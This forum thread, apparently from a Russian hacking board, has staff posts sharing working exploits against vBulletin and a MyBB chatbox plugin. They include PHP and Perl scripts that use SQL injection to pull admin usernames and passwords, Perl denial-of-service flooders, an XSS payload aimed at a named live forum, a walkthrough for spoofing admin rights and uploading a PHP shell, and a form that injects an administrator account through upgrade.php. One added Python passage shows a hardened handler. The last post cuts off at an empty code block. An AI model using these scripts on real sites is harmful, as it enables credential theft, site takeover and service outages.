
vBulletin vulnerabilities

Thread in the "Vulnerabilities of popular CMS" section, started by user rijy, 29 Aug 2006.

  1. Хулиган
    Хулиган, Forum staff, Advanced
    Likes:
    242
    vBulletin 3.x / 4.x / 5.x remote SQL Injection PHP exploit


    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <style>
    body {background-color: black; font-family: Verdana;  font-size: 10pt; color: #d9d9d9; margin: 30px; 30px; auto; background-attachment: fixed; background-image: url('https://lh6.googleusercontent.com/-C-Zv0fYrOtU/UJgYzWMMUiI/AAo/3UyiI7kIcQo/s600/back4.jpg'); background-repeat: no-repeat; background-position: right bottom;}
    div  { margin: 30px; 30px; auto; }
    
    </style>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title> vBulletin 3.x / 4.x  / 5.x remote SQL Injection PHP exploit [y] Cold z3ro </title>
    </head>
    <body>
    
    <form method="post"/>
    <table width="100%" border="0">
    <tr>
    <td>target</td>
    <td><input type="text" value="<? if($_POST[host]) {echo $_POST[host]; }else{echo 'http://forum.dnevno.hr/';} ?>" name="host" size="70" />
    </td>
    </tr>
    <tr>
    <td>userid</td>
    <td><input type="text" value="<? if($_POST[uid]) {echo $_POST[uid]; }else{echo '1';} ?>" name="uid" size="6" /><input type="submit" name="exp" value="Exploit-it"/></td>
    </tr>
    </table>
    </form>
    
    <div>
    
    <?php
    
    /**
    * @exploit  vBulletin 3.x/4.x/5.x ( quick_replay ) remote SQL Injection PHP exploit
    * @author  Cold z3ro
    * @site  http://www.hackteach.org , http://www.s3curi7y.com
    * @copyright   26-12-2012
    * @about it    Its depends on ajax.php file, and comments quick replay via ajax file if anabled.
    * @Note  This exploit coded for english language vBulletin forums,
    * @Note.  non english exploit will faild,you need to exploit it manually
    * @Note.  or to edit some variables depends on the fourm main language.
    * @Note.  Exploit takes time while executing.
    * @type  0day, danger  
    **/
    
    set_time_limit(0);
    ini_set('user_agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)');
    
    function fetchinj( $string, $str, $end ){
    $string = " ".$string;
    $ini = strpos( $string,$str );
    if ($ini == 0) return "";
    $ini += strlen( $str );
    $len = strpos( $string,$end,$ini ) - $ini;
    return substr( $string,$ini,$len );
    }
    
    function pagethis( $surl ){
    $ch = curl_init();
    curl_setopt ( $ch, CURLOPT_URL, $surl );
    curl_setopt ( $ch, CURLOPT_HEADER, 0 );
    ob_start();
    curl_exec ( $ch );
    curl_close ( $ch );
    $data = ob_get_contents();
    ob_end_clean();
    return $data;
    }
    
    if ($_POST['exp']){
    $host = $_POST['host'];
    $uid = $_POST['uid'];
    
    if( !eregi('http://', $host)){
    die('use "http://" in the link you moron');
    }else{
    
    $back = substr($host,-1,1);
    if ($back !="/"){
    $lnk = "/ajax.php";
    }else{
    $lnk = "ajax.php";
    }
    
    $lnk.= '?do=';
    $lnk.= 'quick_replay';
    $lnk.= "&t=";
    
    # checking site requirement
    $link2check   = pagethis( $host.'showthread.php?t=210' );
    $_link2check  = pagethis( $host.'showthread.php?t=400' );
    $check1 = strstr( $link2check, 'You are not logged' );
    $check2 = strstr( $link2check, 'If you followed a valid link' );
    $check3 = strstr( $_link2check, 'If you followed a valid link' );
    
    if( $check1 == true ){
    die('Exploit Faild: target need login authentication');
    }else if( $check2 == true and $check3 == true ){
    
    # make the exploit exactly and much better
    # looking for 25 $_GET[t];
    for( $i=5; $i<30; $i++ ){
    $multicheck = pagethis( $host.'showthread.php?t='.$i.'' );
    $what2check = strstr( $multicheck, 'vBulletin Message' );
    $found  = array( $what2check );
    foreach ( $found as $value => $val ){
    if ( !$val[0] )
    break 2;
    }  
    
    }
    
    }
    
    # Injecton SQL.
    $exp = '+union+select+1,2,3,';
    $exp.= 'concat(0x7a33726f31,username,0x0d0a,password,0x7a33726f32)';
    $exp.= ',5,6,username,8,9,10,11,12,13,14,15,16,17';
    $exp.= '+from+user+where+';
    $exp.= 'userid='.$uid.'--';
    
    if ( $i ){
    $exp = $host.$lnk.$i.$exp;
    }else{
    $exp = $host.$lnk.'32'.$exp;
    }
    
    $extinj = pagethis( $exp );
    $result = fetchinj( $extinj, 'z3ro1', 'z3ro2' );
    //print_r($result);
    
    if ( $result[1] ){
    echo 'Exploit fineshed :<br><br>'.$result;
    }else{
    echo 'Exploit Faild';
    }
    }
    }
    
    # Eof
    
    ?>
    </div>
    
    </body>
    </html>
    

    the very one that was being sold on 1337day.com for $500
    check it out, hackerz
     
    6 Dec 2012
  2. Хулиган
    Хулиган, Forum staff, Advanced
    Likes:
    242
    Code:
    # Exploit Title: Helpful Answers XSS
    # Date: September 23 2012
    # Software Version: All
    # Product Download: http://www.vbulletin.org/forum/showthread.php?t=233296
    POC:
    Code:
    helpfulanswers.php?do=topanswers&sortfield=[XSS]
    Proof:
    Code:
    http://forum.roadfly.com/helpfulanswers.php?do=topanswers&sortfield="><script>alert(document.cookie);</script>
     
    7 Dec 2012
  3. Хулиган
    Хулиган, Forum staff, Advanced
    Likes:
    242
    vBulletin 3.x / 4.x AjaxReg SQL Injection

    Code:
    #!/usr/bin/php
    <?
    
    # vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
    # https://lh3.googleusercontent.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
    # livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E
    # check it : http://localhost/vBulletin/clientscript/register.js
    
    function usage ()
    {
        echo
            "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
            "\n[+] Author: Cold z3ro".
            "\n[+] Site  : http://www.hackteach.org | http://www.s3curi7y.com".
            "\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869".
            "\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
            "\n[+] Ex.   : php 0day.php localhost /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
            "\n[+] Note. : Its a 0day exploit\n\n";
        exit ();
    }
     
    function check ($hostname, $path, $field, $pos, $usid, $char)
    {
        $char = ord ($char);
        $inj = 'ajax.php?do=CheckUsername&param=';
      $inj.= "admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
      $culr = $hostname.$path.$inj;
      $curl = curl_init();
      curl_setopt ($curl, CURLOPT_URL, $culr );
      curl_setopt($curl, CURLOPT_HEADER, 1);
      curl_setopt($curl, CURLOPT_VERBOSE, 0);
        ob_start();
        curl_exec ($curl);
        curl_close ($curl);
        $con = ob_get_contents();
        ob_end_clean();
      if(eregi('Invalid',$con))
          return true;
        else
            return false;
    }
     
     
    function brutechar ($hostname, $path, $field, $usid, $key)
    {
        $pos = 1;
        $chr = 0;
        while ($chr < strlen ($key))
        {
            if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
            {
                echo $key [$chr];
                $chr = -1;
                $pos++;
            }
            $chr++;
        }
    }
     
     
    if (count ($argv) != 4)
        usage ();
     
    $hostname = $argv [1];
    $path = $argv [2];
    $usid = $argv [3];
    $key = $argv [4];
    if (empty ($key))
        $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
     
    echo "[+] Username: ";
    brutechar ($hostname, $path, "username", $usid, $key);
    echo "\n[+] Password: ";
    brutechar ($hostname, $path, "password", $usid, $key);
    echo "\n[+] Done..";
    echo "\n[+] It's not fake, its real.";
    # word to 1337day.com, stop scaming me
    
    ?>
     
    12 Dec 2012
  4. Waringoe
    Waringoe, Newbie
    Likes:
    0
    Please explain how to run vBulletin 3.x / 4.x AjaxReg SQL Injection.
    I tried it on Denwer and nothing works; it feels like some kind of fake.
     
    14 Jan 2013
  5. Хулиган
    Хулиган, Forum staff, Advanced
    Likes:
    242
    14 Jan 2013
  6. Хулиган
    Хулиган, Forum staff, Advanced
    Likes:
    242
    Vbulletin xmlsitemap Page Denial of Service


    Code:
    #!/usr/bin/perl
    #####################################
    # Vbulletin xmlsitemap Denial of Service
    #
    # Version: 4.*.*
    #
    # Code Written By Amir
    #
    # Home : Www.IrIsT.Ir - www.irist.ir/forum
    #
    # Greats : B3HZ4D - C0dex - TaK.FaNaR - Beni_Vanda - 0x0ptim0us - skote_vahshat 
    #
    # IR Anonymous - silent - Mr.epsilon - sajjad13and11 - Mr-Fardin & All Member In IrIsT.Ir
    #
    #####################################
    use IO::Socket;
    
    $host = $ARGV[0];
    $path = $ARGV[1];
    
    if(!$ARGV[1])
    {
    print "################################################# \n";
    print "## Vbulletin xmlsitemap Denial of Service\n";
    print "## Discoverd By Amir \n";
    print "## Www.IrIsT.Ir \n";
    print "################################################# \n";
    print "## [host] [path] \n";
    print "## host.com /Vbulletin/\n";
    print "################################################# \n";
    exit();
    }
    for($i=0; $i<99999; $i++)
    {
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
    $post = "sitemap_filename=%1%1%1%1%1%1%1%1%1%1%1%";
    $pack.= "POST " .$path. "/xmlsitemap.php HTTP/1.1\r\n";
    $pack.= "Host: " .$host. "\r\n";
    $pack.= "User-Agent: Googlebot/2.1\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: " .length($post). "\r\n\r\n";
    $pack.= $post;
    print $socket $pack;
    syswrite STDOUT, "*";
     
    8 Mar 2013
  7. Хулиган
    Хулиган, Forum staff, Advanced
    Likes:
    242
    vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection


    Code:
    # Exploit Title: vBulletin 5 Beta XX SQLi 0day
    # Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
    # Date: 24/03/2013
    # Exploit Author: Orestis Kourides
    # Vendor Homepage: www.vbulletin.com
    # Software Link:
    # Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
    # Tested on: Linux
    # CVE : None
     
    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Cookies;
    use HTTP::Request::Common;
    use MIME::Base64;
    system $^O eq 'MSWin32' ? 'cls' : 'clear';
    print "
    +===================================================+
    |           vBulletin 5 Beta XX SQLi 0day           |
    |              Author: Orestis Kourides             |
    |             Web Site: www.cyitsec.net             |
    +===================================================+
    ";
      
    if (@ARGV != 5) {
        print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
        exit;
    }
      
    $host       = $ARGV[0];
    $path       = $ARGV[1];
    $username   = $ARGV[2];
    $password   = $ARGV[3];
    $magicnum   = $ARGV[4];
    $encpath    = encode_base64('http://'.$host.$path);
    print "[+] Logging\n";
    print "[+] Username: ".$username."\n";
    print "[+] Password: ".$password."\n";
    print "[+] MagicNum: ".$magicnum."\n";
    print "[+] " .$host.$path."auth/login\n";
    my $browser = LWP::UserAgent->new;
    my $cookie_jar = HTTP::Cookies->new;
    my $response = $browser->post( 'http://'.$host.$path.'auth/login',
        [
            'url' => $encpath,
            'username' => $username,
            'password' => $password,
        ],
        Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
        User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $browser->cookie_jar( $cookie_jar );
    my $browser = LWP::UserAgent->new;
    $browser->cookie_jar( $cookie_jar );
    print "[+] Requesting\n";
    my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
        [
            'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
        ],
        User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $data = $response->content;
    if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
    print "\n";
    exit 1;
     
    28 Mar 2013
  8. Хулиган
    Хулиган, Forum staff, Advanced
    Likes:
    242
    Vbulletin misc Page Denial of Service


    Code:
    #!/usr/bin/perl
    #####################################
    # Vbulletin misc Page Denial of Service
    # Version: 4.*.*
    # Code Written By Amir
    # Site : Www.IrIsT.Ir - Www.IrIsT.Ir/forum - Www.IrIsT.Ir/en
    # Facebook Page : https://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
    # Greats : All Member In IrIsT.Ir
    #####################################
    use IO::Socket;
    
    $host = $ARGV[0];
    $path = $ARGV[1];
    
    if(!$ARGV[1])
    {
    print "################################################# \n";
    print "## Vbulletin misc Page Denial of Service\n";
    print "## Discoverd By Amir \n";
    print "## Www.IrIsT.Ir \n";
    print "################################################# \n";
    print "## [host] [path] \n";
    print "## host.com /Vbulletin/\n";
    print "################################################# \n";
    exit();
    }
    for($i=0; $i<99999; $i++)
    {
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
    $post = "do=getsmilies&result=%0%0%0%0%0%0%0";
    $pack.= "POST " .$path. "/misc.php HTTP/1.1\r\n";
    $pack.= "Host: " .$host. "\r\n";
    $pack.= "User-Agent: Googlebot/2.1\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: " .length($post). "\r\n\r\n";
    $pack.= $post;
    print $socket $pack;
    syswrite STDOUT, "*";
    }
     
    16 Apr 2013
  9. Хулиган
    Хулиган, Forum staff, Advanced
    Likes:
    242
    ChangUonDyU - Extra File Chatbox v3.6.0 Multiple vulnerabilities


    Code:
    # Exploit Title: Multiple vulnerabilities in ChangUonDyU - Extra File Chatbox 
    # Date: 03.02.2013
    # Author: Inquiry from http://crackhackforum.com
    # Vendor or Software Link: http://community.mybb.com/thread-63559.html
    # Software Link: community.mybb.com/attachment.php?aid=17079
    # Version: Affected are all versions up to 3.6.2
    # Google Keywords: 
    # Tested on: Opera 12.15 & FireFox 21
    ##Greetings to all http://crackhackforum.com members.##
     
    ########################################################################################
    [Introduction]
    ChangUonDyU - Extra File Chatbox is a MyBB plugin used for live chatting with other users on the forum. The developer was probably quite lazy (no offense) because of the high amount of vulnerabilities in the plugin. With a short look there exist several persistent Cross Site Scripting vulnerabilities, a Code Execution and an Authentication Vulnerability. Although the XSS and Code Execution are the most dangerous in the list, the Authentication vulnerability makes it all possible to happen. The impact of the vulnerability is very dangerous and combining all these could lead to defacing. To be exact it's possible to upload a shell to the target server while just being a regular user. The concept is actually easy: a regular member is able to register on the forum and use the shoutbox. As there is a 'small' Authentication vulnerability, the regular member with no permissions at all is able to gain Administrator privileges to perform the actions any person with real privileges is able to. Having Administrator privileges, it's possible to trigger several XSS's and Code Execution. With persistent XSS we're able to steal the Security tokens of an Administrator to perform CSRF & with Code Execution we're able to execute our shell on the target's system.
     
    [0x01 XSS]
    Actually there's no XSS protection at all and all the forms are vulnerable to it. The ones which appear the most are with the 'Ban User' command and 'Notice' command. In this example I'll tell you the XSS with the Ban command because we'll upload the shell with the /notice command.
    Banning works by entering a banning command which states the user ID and banning reason as such: /ban 1 (bans the person with ID 1 in the forum) Advertising (the reason which goes to the logs to review in case you'd like to unban). By replacing the banning reason with the XSS payload, it'll be executed.
     
    Example : Original & XSS banning commands which will ban the person with User ID 1 which is mostly Administrator
    Original : /ban 1 advertising 
    Malicious : /ban 1 <script>alert('1')</script>
     
    Note: XSS won't disappear after unbanning the user, no matter if you even re-ban him several times. As the message goes to the Archive of the shoutbox, it'll leave only after using the /prune command to clear the chatbox & its archive.
    The question remains, how are we able to use it, because only administrators and Staffs/Moderators are able to ban. There's also a solution to this: if you read the above then you know that there's also an Authentication vulnerability which allows us to gain the rights. Scroll down the page to find out how, although I suggest to keep reading.
     
    Proof of Concept : 
    function build_ban($shout)
    {
            global $config,$phrase;
            $text = "ban > $shout[userid] > $shout[username] > $shout[dateline] > <span class='smallfont'>#<b>$shout[username]</b> ";
            if (!empty($shout['banusername']))
            {
                    $text .= "$phrase[banned_name] <a href='http://{$config['cbforumlink']}/member.php?action=profile&uid=$shout[banuserid]' target='_blank'>$shout[banusername]</a>";
            }
            else
            {
                    $text .= "$phrase[banned] <a href='http://{$config['cbforumlink']}/member.php?action=profile&uid=$shout[banuserid]' target='_blank'>$shout[banuserid]</a>";
            }
            if ($shout['reason']) $text .= ". <i>$phrase[reason]: $shout[reason].</i>";
            $text .= '#</span>';
            return $text;
    }
     
    [0x02 Code Execution]
    Like I told above there are several vulnerabilities and a lot of XSS's and almost all the forms in the chatbox's Cpanel aren't having any kind of protection. Neither does the /notice page. It's actually quite easy to trigger the XSS in there because we just have to insert our payload as a Notice, but as I said there's no protection which gives us an opportunity for Code Execution. You're almost all smart enough in here I assume that you know what that means, but I'll go through it with a sentence to make it clear to everyone. With entering an XSS payload as the notice such as <script>alert('1')</script> it'll be executed. Yet we can replace the XSS payload with the code we'd like and that code could be a PHP shell and it'll be executed on the server and give us access to it. Yet again we don't have any permissions to trigger the Code Execution, but read below because there's the solution. The downside of this is that you can access the shell through the shoutbox and that's obvious as we executed the shell through the shoutbox's notice. You can use any of these 404:forbidden shells because that'll give you some extra time yet that's enough to make another backdoor and put the shoutbox working again although it works, just the notice will appear as a 404:forbidden.
     
    Proof of Concept : 
    function build_notice()
    {
            global $fcbfile,$smilies;
            $noticef = file_get_contents($fcbfile['notice']);
            $handle = fopen($fcbfile['ds_notice'],"w");
            if ($noticef)
            {
                    $noticef = BBCode($noticef);
                    $noticef = strtr($noticef, $smilies);
            }
            fwrite($handle, $noticef);
            fclose($handle);
    }
     
    [0x03 Authentication Vulnerability]
    That's probably the most interesting finding in the whole package, at least it is in my sight and that's the point which makes the two above & one below possible. When I was looking for various security risks in the plugin I also opened up HTTP live header which is a popular FireFox addon for viewing the HTTP traffic going by. While chatting to myself in the WAMP I also took a look at the HTTP headers and noticed the HTTP request for posting a message in the shoutbox; it looked as follows:
     
    Explained : http://host.ltd/[path]/chatbox/index.php?do=postshout&key=[SSID]&userid=1000&groupid=1&username=<span style="color: [The color of the username];"><strong>[Name]</strong></span>&message=[Message]
    Real request : http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=2&groupid=1&username=<span style="color: #5EFF00;"><strong>Inquiry</strong></span>&message=Inquiry
     
    That made me think how the developer managed to verify that the request is coming from a legitimate user. By seeing the previous work of the developer I was sure that I'm also able to find something out of there because verifying or locking the permissions would be quite hard for him. Within a few minutes I thought how he most likely organized the "who has permissions to use commands" list and I thought that probably by giving them to the persons who're having the group ID of Administrators and Moderators/Staffs. And that's the point where I was quite sure that there probably even isn't any kind of protection. I decided to try my luck on that one and replaced the original request with this:
     
     http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=Admin
     Like you can see I've changed some details in the original request. Actually almost all the data except the Security Token which protects against CSRF. I have changed the "UserID" from 2 to 1, "GroupID" from 1 to 4, "Color:" from #5EFF00 to #FF0000 and "Username" from Inquiry to Crackhackforum. Then let's give it a shot and load the request. After processing the request, there should appear a new message in the shoutbox. Yet now the username doesn't appear as yours, but as an Administrator's. Your User ID doesn't show up as yours, but as the Administrator's. And by the way, given how the developer gives permission of the shoutbox, by the group ID, you also have that one as Administrator as GroupID=4 belongs to Administrators. Also the username will look red like it is in most MyBB forums. The best thing about it is that you really are looking like a legitimate username and even another Administrator can't make sure that you're the wrong one. The conclusion we can make from here is that you're now a LEGIT administrator of the shoutbox and absolutely nobody can claim otherwise. That's fun to play an Administrator on a random forum indeed, but we're still trying to make some more progress and go further. Like we know, we're being shown as Administrators and with the Administrator place there come permissions to ban, prune & give new notices and a lot more. That's how we're trying to make some progress.
     Now we'll test whether our hint is correct and whether we are able to use the Administrator's privileges. For that we'll just use a simple pruning command to see if it takes effect and if it does then it means we're successful. The pruning command would look as such then:
      
     http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=/prune
      
     It worked and the shoutbox is being pruned by an Administrator which in this case is us. Now here come in the two previous findings above. First I'll show you how to use the banning command to perform an XSS attack and as we're in the forum it might cause everything that XSS causes, but you can even create a small XSS worm with it in the forum.
      
     http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=/ban 1000 [XSS payload]
     As we already know that we're Administrators with legit privileges it isn't a surprise for us that also that one works and the XSS will be executed. The second thing is adding the new notice which goes mainly through the chatbox's Cpanel where we don't have access, but it's also possible to update the notice through the shoutbox with a simple command which I'll show you. 
      
     http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=/notice [<?php PHP shell goes here ?>]
     
     After processing this code it'll be executed and you have your shell on the server which will give you permission to the whole database to do whatever you'd like.
    Note*: You have to click the link(e.g posting it to the shoutbox and then clicking it) or otherwise the request won't be processed.
    Note*: You have to either decode the URL or remove the spaces. It's because you have to click the link, but if there are spaces then the URL will be read to the first space. 
    Note*: Your shoutbox might use the colors name instead of HEX values. It depends on the shoutbox you're using. 
     Proof of Concept : 
     ##### POST SHOUT #######
    if ($_REQUEST['do'] == 'postshout')
    {
            $managegroup = explode(",", $config['managegroup']);
            $shout = $_REQUEST;
             
            if ($config['check_domain_reffer'] AND !checkpost($config['forumlink'] , $_SERVER['HTTP_REFERER']))
            {
                    echo $phrase['accessdenied'];
                    exit;
            }
             
            $request_ip = $_SERVER['REMOTE_ADDR'];
             
            if ($config['strip_slash'])
            {
                    $shout['username'] = stripslashes($shout['username']);
                    $shout['message'] = stripslashes($shout['message']);
            }
             
            if ($config['check_chatbox_key'] AND !check_chatbox_key($shout['key'], $shout['userid'], $shout['username'], $shout['groupid']))
            {
                    echo $phrase['accessdenied'];
                    exit;
            }
             
            $banneds = unserialize(file_get_contents($fcbfile['ds_banned']));
     
            $cancommand = false;
            if (in_array($shout['groupid'], $managegroup))
            {
                    $cancommand = true;
            }
             
            if ($shout['message'] && $shout['userid'])
            {
                    // CHECK BANNED USER
                    if (isset($banneds[$shout['userid']]))
                    {
                            echo $phrase['bannotice'];
                            exit;
                    }
      
     [0x04 XSS & HTML injection on the HTTP request]
     That's probably as dangerous as the first XSS and comparing it to those vulnerabilities above it's basically nothing. Yet if I hadn't found the other ones then it would be a critical one and I think it's worth to be mentioned. It's kinda related to the above vulnerability which means the /index.php?do=postshout can be exploited in several ways. Again, comparing to the above vulnerabilities it's kinda useless although maybe the Administrator blocks the other vulnerabilities and then it could work out. I think that explaining this doesn't need any further sentences because you can understand it from the link:
      
      http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span><Here goes HTML or XSS>&message=CrackHackForum
      
     Proof of Concept : The same as it's with the 0x03
     ##Greetings to all http://crackhackforum.com members and specially to BaseHack Network crew members Thallium, DES and Vash.##
     
    # 700E38F66557523E   1337day.com [2013-04-30]   49F1383FFBD3B9F7 #
     
    30 Apr 2013
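The authorization flaw described in section 0x03 of the post above (the handler takes userid and groupid from the request, and the key is not bound to them) is modelled here as an added Python example; it is not the plugin's PHP and not part of the original post. A handler with the flaw is shown beside a hardened one that derives identity only from a server-side session and escapes client-supplied text before rendering. The session store, the keys, the group ids in MANAGE_GROUPS and the function names are constructed for illustration.

```python
import html

# Constructed server-side session store: key -> identity established at login.
# (The plugin's real check_chatbox_key() logic is not shown on the page.)
SESSIONS = {
    'sess-regular-user': {'userid': 2, 'groupid': 1, 'username': 'Inquiry'},
    'sess-admin': {'userid': 1, 'groupid': 4, 'username': 'SiteAdmin'},
}
# Constructed equivalent of the plugin's managegroup list: groups allowed to run commands.
MANAGE_GROUPS = {4, 6}


def is_command(message):
    """Shoutbox commands such as /ban, /prune and /notice start with a slash."""
    return message.startswith('/')


def postshout_vulnerable(request):
    """Mirrors the flaw in the advisory: once the key is recognised, the handler
    believes whatever userid/groupid the client sent alongside it."""
    if request.get('key') not in SESSIONS:
        return {'status': 'denied'}
    userid = int(request['userid'])
    groupid = int(request['groupid'])
    message = request.get('message', '')
    if is_command(message) and groupid not in MANAGE_GROUPS:
        return {'status': 'denied'}
    # Username and message are rendered unescaped: the stored-XSS part of the advisory.
    rendered = f"<b>{request['username']}</b> {message}"
    return {'status': 'ok', 'as_user': userid, 'groupid': groupid,
            'command': is_command(message), 'rendered': rendered}


def postshout_hardened(request):
    """Identity and group come only from the server-side session; client-supplied
    userid/groupid/username are ignored for authorization and escaped for display."""
    session = SESSIONS.get(request.get('key'))
    if session is None:
        return {'status': 'denied'}
    message = request.get('message', '')
    if is_command(message) and session['groupid'] not in MANAGE_GROUPS:
        return {'status': 'denied'}
    rendered = f"<b>{html.escape(session['username'])}</b> {html.escape(message, quote=True)}"
    return {'status': 'ok', 'as_user': session['userid'], 'groupid': session['groupid'],
            'command': is_command(message), 'rendered': rendered}


# Constructed request of the shape shown in 0x03: a regular user's key with the
# userid/groupid/username fields rewritten to an administrator's.
SPOOFED = {'key': 'sess-regular-user', 'userid': '1', 'groupid': '4',
           'username': '<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>',
           'message': '/prune'}

if __name__ == '__main__':
    print('vulnerable:', postshout_vulnerable(SPOOFED))
    print('hardened:  ', postshout_hardened(SPOOFED))
```

The point the split makes: a per-user key only proves that a session exists; every authorization decision and every displayed name must be read from that session, never from request fields the same client controls.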
  10. Хулиган
    Хулиган, Forum staff, Advanced
    Likes:
    242
    that very one)

    vBulletin 4.1.x and 5.x.x 0day Exploit released by 1337 Hacker
    Code:
    <html xmlns="http://www.w3.org/1999/xhtml"><head> 
     
     
     
     
     
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
     
    <title>vBulletin 0day</title> 
     
    <style type="text/css"> 
     
    <!--
     
    body {
     
        background-color: #000;
     
        text-align: center;
     
        color: #063;
     
        font-size: large;
     
    }
     
    .a {    font-size: 24px;
     
    }
     
    .f {    color: #060;
     
    }
     
    .gbf {    color: #F00;
     
    }
     
    .dd {
     
        color: #F00;
     
    }
     
    .w {
     
        font-size: large;
     
    }
     
    a:link {
     
        text-decoration: none;
     
    }
     
    a:visited {
     
        text-decoration: none;
     
    }
     
    a:hover {
     
        text-decoration: none;
     
    }
     
    a:active {
     
        text-decoration: none;
     
    }
     
    -->
     
    </style></head><body> 
     
    <p class="a">
    
     
    <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1> 
     
    <br>Created by: 1337
    <br>Found on: 08/22/2013
    <br>Website: http://www.madleets.com
    </p> 
    
    <br>
    <?php
    //extract data from the post
    if(isset($_POST['submit'])){
    extract($_POST);
    //set POST variables
    $url = $_POST['url'];
    $fields = array(
                            'ajax' => urlencode('1'),
                            'version' => urlencode('install'),
                            'checktable' => urlencode('false'),
                            'firstrun' => urlencode('false'),
                            'step' => urlencode('7'),
                            'startat' => urlencode('0'),
                            'only' => urlencode('false'),
                            'customerid' => urlencode($_POST['customerid']),
                            'options[skiptemplatemerge]' => urlencode('0'),
                            'response' => urlencode('yes'),
                            'htmlsubmit' => urlencode('1'),
                            'htmldata[username]' => urlencode($_POST['username']),
                            'htmldata[password]' => urlencode($_POST['password']),
                            'htmldata[confirmpassword]' => urlencode($_POST['password']),
                            'htmldata' => urlencode($_POST['email'])
                    );
    //url-ify the data for the POST
    foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
    rtrim($fields_string, '&');
    //open connection
    $ch = curl_init();
    //set the url, number of POST vars, POST data
    curl_setopt($ch,CURLOPT_URL, $url);
    curl_setopt($ch,CURLOPT_POST, count($fields));
    curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
    curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
    curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
    //execute post
    $result = curl_exec($ch);
    //close connection
    curl_close($ch);
    exit();
    }
    ?>
    <center>
    <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
    <span>Example:http://test.com/forum/install/upgrade.php</span><br>
      <span>Website:</span>
        <input name="url" type="text" tabindex="1" size="60" />
        <br>
        <span>Customer ID:</span>
        <input name="customerid" type="text" tabindex="2" size="40" />
        <br>
        <span>Username:</span>
        <input name="username" type="text" tabindex="3" size="40" />
        <br>
        <span>Password:</span>
        <input name="password" type="text" tabindex="4" size="40" />
        <br>
        <span>Email:</span>
        <input name="email" type="text" tabindex="5" maxlength="40" />
        
    <input name="submit" type="submit" value="Inject Admin">
    </form>
    </center>
     
    <p class="a">------------------------------------------------------------------------------------------------------------------</p> 
     
    <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p> 
     
    <p class="a">------------------------------------------------------------------------------------------------------------------</p> 
     
    
    </div>
            
     </pre> 
     
    <p class="a">&nbsp;</p> 
    <p align="center"> 
     
    
      </body></html>[/CODE]
     
    11 Oct 2013
  11. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    Vbulletin Command Execution Exploit / Shell Upload

    p0c:

    Code:
